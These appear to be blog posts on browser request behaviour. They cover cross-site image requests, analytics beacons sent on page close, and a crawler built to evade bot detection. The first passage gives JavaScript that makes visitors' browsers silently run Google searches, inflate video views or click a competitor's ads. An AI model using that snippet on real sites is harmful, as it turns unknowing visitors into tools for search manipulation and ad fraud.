<p>However, the request is nevertheless fired. The browser can only apply Cross-Origin Read Blocking (CORB) after the requested server has sent a response. Put differently: In order to decide whether the response is acceptable, a request needs to be made in the first place. But making arbitrary GET requests can be dangerous by itself.</p>
<h3>Abusing <code><img></code> requests</h3>
<p>Let's assume we have a small business niche website <code>nichebusiness.com</code> with 500 unique users a day. What would happen if every user's browser executes the following JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">image</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">image</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s1">'https://google.com/search?q=nichebusiness.com%20someHighRankingKeyword'</span><span class="p">;</span>
</code></pre></div>
<p>What happens here? We make a Google search with the query <strong>nichebusiness.com someHighRankingKeyword</strong>. The idea is to manipulate the Google search algorithm.
The hope is that a steady search volume of 500 Google searches a day with our own domain and a desired SEO keyword somehow influences Google's algorithm. There are probably far better (and also more ethical) ways to improve the SEO of a website, but I am just trying to make the point that those <code><img></code> requests could potentially have a harmful impact.</p>
<p>But does Google even serve the SERP response if an <code><img></code> tag launches a Google search? After all, there are many headers set by the browser when an image is requested.</p>
<p>After rebuilding the image request done by the browser, I can confirm that Google answers with a valid SERP response. The search is not rejected based on the request headers. See the reconstructed request below:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">got</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'got'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'fs'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">connection</span><span class="o">:</span> <span class="s1">'keep-alive'</span><span class="p">,</span>
<span class="s1">'user-agent'</span><span class="o">:</span> <span class="s1">'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36'</span><span class="p">,</span>
<span class="nx">dnt</span><span class="o">:</span> <span class="s1">'1'</span><span class="p">,</span>
<span class="nx">accept</span><span class="o">:</span> <span class="s1">'image/avif,image/webp,image/apng,image/*,*/*;q=0.8'</span><span class="p">,</span>
<span class="s1">'sec-fetch-site'</span><span class="o">:</span> <span class="s1">'cross-site'</span><span class="p">,</span>
<span class="s1">'sec-fetch-mode'</span><span class="o">:</span> <span class="s1">'no-cors'</span><span class="p">,</span>
<span class="s1">'sec-fetch-dest'</span><span class="o">:</span> <span class="s1">'image'</span><span class="p">,</span>
<span class="nx">referer</span><span class="o">:</span> <span class="s1">'https://example.org/'</span><span class="p">,</span>
<span class="s1">'accept-encoding'</span><span class="o">:</span> <span class="s1">'gzip, deflate, br'</span><span class="p">,</span>
<span class="s1">'accept-language'</span><span class="o">:</span> <span class="s1">'de-DE,de;q=0.9,en-DE;q=0.8,en-US;q=0.7,en;q=0.6'</span><span class="p">,</span>
<span class="s1">'if-none-match'</span><span class="o">:</span> <span class="s1">'W/"875-176475a2ebc"'</span><span class="p">,</span>
<span class="s1">'if-modified-since'</span><span class="o">:</span> <span class="s1">'Wed, 09 Dec 2020 11:54:21 GMT'</span>
<span class="p">};</span>
<span class="kd">let</span> <span class="nx">live</span> <span class="o">=</span> <span class="s1">'https://www.google.com/search?q=nichebusiness.com%20someHighRankingKeyword'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">got</span><span class="p">(</span><span class="nx">live</span><span class="p">,</span> <span class="p">{</span><span class="nx">headers</span><span class="o">:</span> <span class="nx">headers</span><span class="p">,</span> <span class="nx">https</span><span class="o">:</span> <span class="p">{</span> <span class="nx">rejectUnauthorized</span><span class="o">:</span> <span class="kc">false</span><span class="p">}});</span>
<span class="nx">fs</span><span class="p">.</span><span class="nx">writeFileSync</span><span class="p">(</span><span class="s1">'google_serp.html'</span><span class="p">,</span> <span class="nx">response</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
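<p>A server that wanted to ignore such requests could, in principle, look at the Fetch Metadata headers that appear in the reconstructed request above. The following is only a sketch under the assumption that the browser sends <code>sec-fetch-dest</code> and <code>sec-fetch-site</code> (older browsers do not). The function name is hypothetical:</p>

```javascript
// Hypothetical check: does this request look like it was triggered by an
// image element embedded on a different site?
// Expects an object with lower-cased header names, as Node.js provides them.
function looksLikeCrossSiteImageRequest(headers) {
  return headers['sec-fetch-dest'] === 'image'
    && headers['sec-fetch-site'] === 'cross-site';
}

// Possible use inside a request handler for a non-image endpoint:
//   if (looksLikeCrossSiteImageRequest(req.headers)) { /* reject or ignore */ }
```

<p>Requests without these headers pass the check, so this would only filter out requests from browsers that send them.</p>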
<h3>Conclusion</h3>
<p>There are many other ways in which such cross domain image requests could potentially be abused:</p>
<ol>
<li>Promote your own YouTube video by increasing views. Make a request to <code>https://www.youtube.com/watch?v={someVideo}</code> in the <code><img></code> tag.</li>
<li>Drain your competitor's Google Ads budget by making requests to your competitor's ad links.</li>
<li>Invoke any other action that can be reached by a GET request.</li>
</ol>Reliable Cross Domain Requests when the User leaves the Page2020-12-10T21:58:00+01:002020-12-13T11:00:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-10:/2020/12/10/reliable-cross-domain-requests-on-page-close/<p>In this article, I demonstrate how to reliably communicate JSON data to a cross domain server after the user is about to end or interrupt the browsing session by either:</p>
<ul>
<li>switching the focus to another page</li>
<li>switching from the browser to another application</li>
<li>closing the tab</li>
<li>closing the browser</li>
</ul>
<p>or any other means of terminating or interrupting the current browsing session. Mobile devices and desktop devices should be equally supported.</p>
<p>Why do I have this very specific requirement?</p>
<p>I am in the process of developing a JavaScript analytics application
and I need to record user interactions and send those user interactions from any
website to my remote server.</p>
<p>Put differently: I need to record user interactions up until the point where the user leaves the browsing session. The ideal approach for this scenario is to attach an event listener to the <code>visibilitychange</code> event:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">localStorage</span><span class="p">.</span><span class="nx">setItem</span><span class="p">(</span><span class="s1">'triggeredOnPageClose'</span><span class="p">,</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">());</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>This event fires when the user loses focus of the current window and the page visibility becomes hidden, for example when the user changes the tab.</p>
<p>However, is the above event also triggered when the user closes the page or closes the entire browser? In order to verify this scenario, we
actually have to write a piece of data to the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage">browser's local storage</a>, because
we have no meaningful way to debug the occurrence of this event otherwise.</p>
<p>So let's do the following steps:</p>
<ol>
<li>Navigate to https://example.org in your browser</li>
<li>Paste the above code snippet in your browser console</li>
<li>Close the tab by clicking on the <code>x</code></li>
<li>Navigate again to https://example.org</li>
<li>Read the local storage with <code>localStorage.getItem('triggeredOnPageClose')</code></li>
<li>If you see the correct date as output, then <code>visibilitychange</code> is fired when closing the tab</li>
<li>Repeat steps 1-6 but instead close the entire browser application</li>
</ol>
<p>After doing the above steps, I could confirm that the event <code>visibilitychange</code> is also triggered when closing the tab or closing the browser.</p>
<p>So in this blog article, we have to find a reliable mechanism to send JSON data to our remote server as soon as the above event occurs.</p>
<p>We have the following requirements:</p>
<ul>
<li>CORS can be enabled on our server, thus CORS requests are allowed</li>
<li>Data transmission needs to be as reliable as possible. It would be very bad if recorded data is lost</li>
</ul>
<h3>The test server</h3>
<p>I use a simple express server to test my application. Below is the server code. It doesn't need much explanation.
CORS support is enabled and the server mostly logs request data when a request arrives.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">cors</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'cors'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">bodyParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'body-parser'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'path'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3333</span><span class="p">;</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">express</span><span class="p">.</span><span class="nx">json</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">cors</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="nx">limit</span><span class="o">:</span> <span class="s1">'2mb'</span> <span class="p">}));</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">text</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/t'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">sendFile</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="s1">'../public/test.jpg'</span><span class="p">));</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/t'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="s1">'ok'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example app listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span>
<span class="p">});</span>
</code></pre></div>
<p>Let's assume the server listens on <code>https://myserver.com</code> from here on.</p>
<h3>Experimenting with different browser web APIs</h3>
<p>Initially, I thought that sending JSON data to another server would be an ideal fit for the rather new <a href="https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API">fetch()</a> API.</p>
<p>I tried the following:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Using XMLHttpRequest or fetch</span>
<span class="kd">const</span> <span class="nx">cdRequestMethod</span> <span class="o">=</span> <span class="s1">'fetch'</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">userLeavesPage</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://myserver.com/t?event='</span> <span class="o">+</span> <span class="nx">s</span> <span class="o">+</span> <span class="s1">'-'</span> <span class="o">+</span> <span class="nx">cdRequestMethod</span> <span class="o">+</span> <span class="s1">'-'</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">cdRequestMethod</span> <span class="o">===</span> <span class="s1">'XMLHttpRequest'</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// uses the XMLHttpRequest api</span>
<span class="kd">var</span> <span class="nx">xmlhttp</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="nx">xmlhttp</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">url</span><span class="p">);</span>
<span class="nx">xmlhttp</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span> <span class="s2">"application/json"</span><span class="p">);</span>
<span class="nx">xmlhttp</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span><span class="nx">message</span><span class="o">:</span> <span class="s1">'test'</span><span class="p">}));</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nx">cdRequestMethod</span> <span class="o">===</span> <span class="s1">'fetch'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">method</span><span class="o">:</span> <span class="s1">'POST'</span><span class="p">,</span>
<span class="nx">headers</span><span class="o">:</span> <span class="p">{</span>
<span class="s1">'Content-Type'</span><span class="o">:</span> <span class="s1">'application/json'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">body</span><span class="o">:</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span><span class="nx">message</span><span class="o">:</span> <span class="s1">'test'</span><span class="p">}),</span>
<span class="p">})</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">data</span> <span class="p">=></span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"visibilitychange:"</span> <span class="o">+</span> <span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">});</span>
</code></pre></div>
<p>Whenever I switch to a different tab, the <code>visibilitychange</code> event fires with the visibility state <code>hidden</code> and the POST request is sent successfully,
both with <code>fetch()</code> and with <code>XMLHttpRequest</code>.</p>
<p>However, when I close the tab or the browser, the POST request is NOT sent. This should not happen, because we established earlier that the event <code>visibilitychange</code> is also triggered when the tab or browser is closed. It seems that the browser aborts all pending HTTP requests when the tab or browser is being closed.</p>
<p>This is bad and we cannot accept that. After all, this would result in a loss of valuable analytics data.</p>
<p>Then I wanted to check other events. To get a better understanding of the different events in the DOM, I suggest reading <a href="https://www.igvita.com/2015/11/20/dont-lose-user-and-app-state-use-page-visibility/">this blog article</a>.</p>
<div class="highlight"><pre><span></span><code><span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"beforeunload"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"beforeunload"</span><span class="p">);</span>
<span class="p">});</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"unload"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"unload"</span><span class="p">);</span>
<span class="p">});</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"pagehide"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"pagehide"</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>
<p>The results were mixed across the board. For example, <code>fetch()</code> would successfully send the data when attached to the event <code>beforeunload</code>, but <code>XMLHttpRequest</code> would fail to do so.</p>
<p>After a bit of frustration and searching around, I found the following explanation on the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">MDN page about the sendBeacon API</a>.</p>
<blockquote>
<p>Ensuring that data has been sent during the unloading of a document has traditionally been difficult, because user agents typically ignore asynchronous XMLHttpRequests made in an unload handler.</p>
</blockquote>
<p>They suggest using <code>navigator.sendBeacon()</code> instead. MDN promises:</p>
<blockquote>
<p>The navigator.sendBeacon() method asynchronously sends a small amount of data over HTTP to a web server. It’s intended to be used in combination with the visibilitychange event (but not with the unload and beforeunload events).</p>
</blockquote>
<p>This is our salvation! We can just use <code>navigator.sendBeacon()</code>! This API is made for exactly our use case!</p>
<p>But does <code>navigator.sendBeacon()</code> also fire when the page is being closed when we attach to <code>visibilitychange</code>? Let's try it:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://myserver.com/t?event='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">();</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="s1">'visibilitychange'</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>Yes, this works properly. I tested the above snippet on my Linux OS with the most recent Chrome browser (<code>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36</code>) and on my mobile phone. In all 8 cases listed below, the above snippet sends the data correctly to my remote server. I tested the following cases for the event <code>visibilitychange</code>. All requests were sent with <code>navigator.sendBeacon()</code> to a remote server on a different origin:</p>
<ol>
<li>One beacon is sent from the desktop browser when the tab is switched ✓</li>
<li>Two beacons are sent from the desktop browser when the tab is closed ✓</li>
<li>Two beacons are sent from the desktop browser when the browser is closed ✓</li>
<li>One beacon is sent from the smartphone browser when the tab is switched ✓</li>
<li>One beacon is sent from the smartphone browser when the tab is closed ✓</li>
<li>One beacon is sent from the smartphone browser when the browser is closed ✓</li>
<li>One beacon is sent from the smartphone browser when the sleep / power off button is pressed ✓</li>
<li>One beacon is sent from the smartphone browser when the home button is pressed ✓</li>
</ol>
<p>Please do not ask me why the desktop Chrome browser sends the beacon twice in cases 2 and 3.</p>
<h3>Is <code>navigator.sendBeacon()</code> broken?</h3>
<p>I found the <a href="https://volument.com/blog/sendbeacon-is-broken">following interesting blog article</a> from a company whose main product is an analytics application. They need a very reliable way to transmit data across domains and tried the sendBeacon API in production.</p>
<p>Their conclusion is the following:</p>
<blockquote>
<p>On this sample set, about 30% of browsers that claim to support the beacon API failed to deliver the data to our servers when the page was closed, which is the whole purpose of the sendBeacon call.</p>
</blockquote>
<p>They state that all those fancy web APIs</p>
<ul>
<li>fetch()</li>
<li>XMLHttpRequest</li>
<li>navigator.sendBeacon()</li>
</ul>
<p>are unreliable and broken if you want to send data at the end of a browsing session on the events
<code>visibilitychange</code>, <code>onbeforeunload</code> or <code>onunload</code>.</p>
<p><a href="https://github.com/mdn/sprints/issues/3722">This GitHub issue discussion</a> explains in depth why this is the case.</p>
<h3>Solution: Reliable cross domain communication with <code><img></code> tags?</h3>
<p>The above article (https://volument.com/blog/sendbeacon-is-broken) suggests using <code><img></code> tags to transmit data. The idea is to use the Image object to send analytics data:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://myserver.com/t?event='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">image</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">image</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">url</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>I tested the exact same 8 cases as above:</p>
<ol>
<li>One img request is sent from the desktop browser when the tab is switched ✓</li>
<li>One img request is sent from the desktop browser when the tab is closed ✓</li>
<li>One img request is sent from the desktop browser when the browser is closed ✓</li>
<li>One img request is sent from the smartphone browser when the tab is switched ✓</li>
<li>One img request is sent from the smartphone browser when the tab is closed ✓</li>
<li>One img request is sent from the smartphone browser when the browser is closed ✓</li>
<li>One img request is sent from the smartphone browser when the sleep / power off button is pressed ✓</li>
<li>One img request is sent from the smartphone browser when the home button is pressed ✓</li>
</ol>
<p>According to my tests, it doesn't matter whether we use <code>navigator.sendBeacon()</code> or <code><img></code> requests. However,
I only tested with two up-to-date browsers and <strong>my sample is far from representative</strong>. The best approach would be to conduct
a statistically sound test under live conditions:</p>
<ul>
<li>Increase a counter on the server side when our analytics JavaScript is loaded. Add a uuid to the analytics JavaScript.</li>
<li>The analytics JavaScript sends an initial request on page load with the uuid embedded in the served JavaScript</li>
<li>Decrease the counter when we receive an analytics request on the event <code>visibilitychange</code> with the matching uuid</li>
</ul>
<p>Hint: Disregard all requests to our application that do not have a valid uuid.</p>
<p>After the above, we have three internal states assigned to the uuid:</p>
<ol>
<li>flag javascript delivered</li>
<li>flag page load request received</li>
<li>flag analytics request received</li>
</ol>
<p>With those flags we can state the following: if the JavaScript was delivered and a page load request was received,
but no analytics request ever arrives, then:</p>
<ul>
<li>either a malicious user intentionally crafted the two requests like that</li>
<li>or the browser failed to deliver the request on <code>visibilitychange</code></li>
</ul>
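<p>The three flags per uuid can be kept in a small server-side structure. The following is only a minimal sketch under my own assumptions: the class <code>DeliveryTracker</code> and its method names are hypothetical, and the state lives in memory, whereas a real test would persist it.</p>

```javascript
// Hypothetical in-memory tracker for the three flags described above.
class DeliveryTracker {
  constructor() {
    // uuid -> { delivered, pageLoad, analytics }
    this.sessions = new Map();
  }

  // Call when the analytics JavaScript is served with a fresh uuid.
  scriptDelivered(uuid) {
    this.sessions.set(uuid, { delivered: true, pageLoad: false, analytics: false });
  }

  // Call for the page load request ('pageLoad') and for the
  // visibilitychange request ('analytics').
  // Requests with an unknown uuid or flag are disregarded.
  mark(uuid, flag) {
    const session = this.sessions.get(uuid);
    if (!session || (flag !== 'pageLoad' && flag !== 'analytics')) {
      return false;
    }
    session[flag] = true;
    return true;
  }

  // Count sessions that loaded the page but never sent the final request.
  stats() {
    let loaded = 0;
    let missing = 0;
    for (const session of this.sessions.values()) {
      if (!session.pageLoad) continue;
      loaded += 1;
      if (!session.analytics) missing += 1;
    }
    return { loaded, missing, failureRate: loaded === 0 ? 0 : missing / loaded };
  }
}
```

<p>The <code>failureRate</code> is an upper bound for the browser failure rate, because crafted requests end up in the same bucket.</p>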
<p>After some more experiments with <code><img></code>, I found the following restrictions for <code><img></code> requests:</p>
<ul>
<li>Not more than ~7700 bytes of GET payload are allowed for the <code><img></code> <code>src</code> attribute</li>
<li>The data in the URL needs to be URL-safe base64 encoded</li>
<li>Because of caching, the same image URL cannot be used twice; otherwise the request is not fired</li>
</ul>
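<p>The three restrictions can be handled in one small helper. This is a sketch, not the code I run in production: the function names, the query parameter names <code>d</code> and <code>t</code> and the constant <code>MAX_QUERY_BYTES</code> are assumptions made for illustration, and the limit is simply the ~7700 bytes I measured.</p>

```javascript
// Assumed limit, taken from the ~7700 bytes measured above.
const MAX_QUERY_BYTES = 7700;

// Encode a string as URL-safe base64: "+" becomes "-", "/" becomes "_",
// and the "=" padding is dropped.
function toUrlSafeBase64(text) {
  const bytes = new TextEncoder().encode(text);
  let binary = '';
  for (const b of bytes) {
    binary += String.fromCharCode(b);
  }
  return btoa(binary).replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}

// Counter that makes URLs unique even within the same millisecond.
let requestCounter = 0;

// Build a unique image URL. The timestamp plus counter acts as a cache
// buster, so the browser never reuses a cached response.
function buildImageUrl(baseUrl, payload) {
  const data = toUrlSafeBase64(JSON.stringify(payload));
  if (data.length > MAX_QUERY_BYTES) {
    throw new Error('payload too large for a single <img> request');
  }
  requestCounter += 1;
  return baseUrl + '?d=' + data + '&t=' + Date.now() + '-' + requestCounter;
}
```

<p>In the browser, the result is assigned to <code>image.src</code> exactly as in the snippet above. On the server, the replacements have to be reversed before decoding.</p>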
<p>In summary, the image requests were fired reliably. Furthermore, <code><img></code> tags are probably
supported by more browsers than the relatively new <code>navigator.sendBeacon()</code> API.</p>
<p>However, since my application sometimes has more than 7700 bytes (even in compressed form) to send, I would need to send the data incrementally. As soon as, let's say, 15kb of data has been collected, make the first <code><img></code> request. When the next 15kb of data is available, send the second batch. The rest of the recorded user interaction is sent at the end, when the event <code>visibilitychange</code> is triggered.</p>
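<p>A minimal sketch of such incremental sending could look as follows. Everything here is hypothetical: the class <code>SessionBatcher</code>, the shape of the message and the <code>send</code> callback, which stands for whatever transport is used. The threshold is a parameter, because it has to stay below what a single request can carry after encoding.</p>

```javascript
// Hypothetical batcher. `send` is the transport, e.g. a function that
// encodes the message and fires an <img> request.
class SessionBatcher {
  constructor(sessionId, send, maxBatchSize = 15 * 1024) {
    this.sessionId = sessionId;
    this.send = send;
    this.maxBatchSize = maxBatchSize; // threshold in characters (approximate bytes)
    this.buffer = [];
    this.bufferedSize = 0;
    this.sequence = 0; // lets the server put the batches back in order
  }

  // Record one user interaction and flush once the threshold is reached.
  record(event) {
    this.buffer.push(event);
    this.bufferedSize += JSON.stringify(event).length;
    if (this.bufferedSize >= this.maxBatchSize) {
      this.flush(false);
    }
  }

  // Call with final = true from the visibilitychange handler, so that the
  // server knows the session is complete.
  flush(final) {
    if (this.buffer.length === 0 && !final) return;
    this.send({
      session: this.sessionId,
      seq: this.sequence,
      final: final,
      events: this.buffer,
    });
    this.sequence += 1;
    this.buffer = [];
    this.bufferedSize = 0;
  }
}
```

<p>The server collects all messages with the same <code>session</code> value and merges them by <code>seq</code> once the message with <code>final</code> set to true has arrived.</p>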
<p>We just have to keep track of this web session with a counter, so that the server can merge the session as soon
as it is finished.</p>Crawling Infrastructure - Introduction2020-05-18T21:29:00+02:002020-05-18T21:29:00+02:00Nikolai Tschachertag:incolumitas.com,2020-05-18:/2020/05/18/crawling-infrastructure-part-1/<p>In this blog article I will introduce my most recent project: <a href="https://github.com/NikolaiT/Crawling-Infrastructure">The distributed crawling
infrastructure</a>, which allows crawling any website with a low-level HTTP library or a fully fledged Chrome browser configured to evade bot detection attempts.</p>
<p>This introduction is divided into three distinct blog articles, because one blog article would be too large to cover this huge topic.</p>
<ol>
<li><em>(This article)</em> The first part of the series motivates the development of the crawling infrastructure, introduces the architecture of the software and demonstrates how the crawling backend works at a high level.</li>
<li>The second part covers the installation of the distributed crawling infrastructure within the AWS cloud infrastructure and tests the freshly deployed stack with a test crawl task.</li>
<li>In the third part of this tutorial series, a crawl task with the top 10,000 websites of the world is created. The downloaded HTML documents are stored in S3. For the top 10,000 websites, we use the scientific <a href="https://tranco-list.eu/">tranco list</a>: a research-oriented top sites ranking hardened against manipulation. As a concluding task, we run business logic on the stored HTML files. For example, we extract all URLs from the HTML documents or we run analytics on the <code><meta></code> tags found in the <code><head></code> section of the documents.</li>
</ol>
<h2>Why would I even need a distributed crawling infrastructure?</h2>
<p>You most likely <strong>do not need</strong> a distributed crawling infrastructure. If you only need to scrape a single website, you can write a simple script that uses <code>lxml</code> and <code>beautifulsoup</code> if you program in Python. Alternatively, you could write a Node.js program that uses <a href="https://github.com/puppeteer/puppeteer">puppeteer</a> if you need to orchestrate a real browser. That approach is sufficient for most cases.</p>
